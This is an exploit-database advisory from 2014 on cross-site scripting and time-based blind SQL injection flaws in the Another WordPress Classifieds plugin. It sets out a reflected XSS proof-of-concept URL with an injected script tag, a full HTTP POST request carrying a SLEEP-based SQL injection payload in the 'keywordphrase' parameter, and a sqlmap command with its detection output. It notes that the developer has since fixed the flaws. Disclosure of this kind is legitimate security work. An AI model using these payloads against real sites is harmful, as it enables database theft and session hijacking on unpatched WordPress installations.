Another Wordpress Classifieds Plugin - SQL Injection Vulnerability

2014-11-10T00:00:00
ID 1337DAY-ID-22846
Type zdt
Reporter dill
Modified 2014-11-10T00:00:00

Description

Another WordPress Classifieds plugin suffers from cross site scripting and remote SQL injection vulnerabilities.

                                        
                                            Exploit Title: Another Wordpress Classifieds Plugin sql injection and Cross Site Scripting  
Author: dill 
download: https://wordpress.org/plugins/another-wordpress-classifieds-plugin/Client 
Webpage: http://awpcp.com/

Issue number 1: Cross-site scripting (reflective) 

Details: 
An arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute and then encapsulated in double quotation marks. This is then echoed in the applications response. 

Proof-of-Concept (PoC): 
http://vulnerable.server/?page_id=16587&step=send-access-key&a40f8%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E76975=1

Issue number 2: SQL injection
Details:
The parameter “keywordphrase” is susceptible to a time-based blind SQL injection when doing a search for classifieds. 

Proof-of-Concept (PoC)
Request:
POST /?page_id=16592 HTTP/1.1
Host: vulnerable.server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://vulnerable.server/?page_id=16592
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-1=1407957654; wp-settings-time-2=1408136814; PHPSESSID=uk871e0cssdnca8oesorbmg2b6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country&regions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=state&regions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=city&regions[0][city]=city

Exploit through sqlmap: 
Copy post request to text file
sqlmap -r keywordphrase.txt -p keywordphrase --dbms=MySQL --level=5

-----------------
Place: POST
Parameter: keywordphrase
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country&regions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=State&regions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=City&regions[0][city]=City

Resolution: Developer was contacted and has since corrected the issues. Update to the latest version of the plugin

#  0day.today [2018-02-09]  #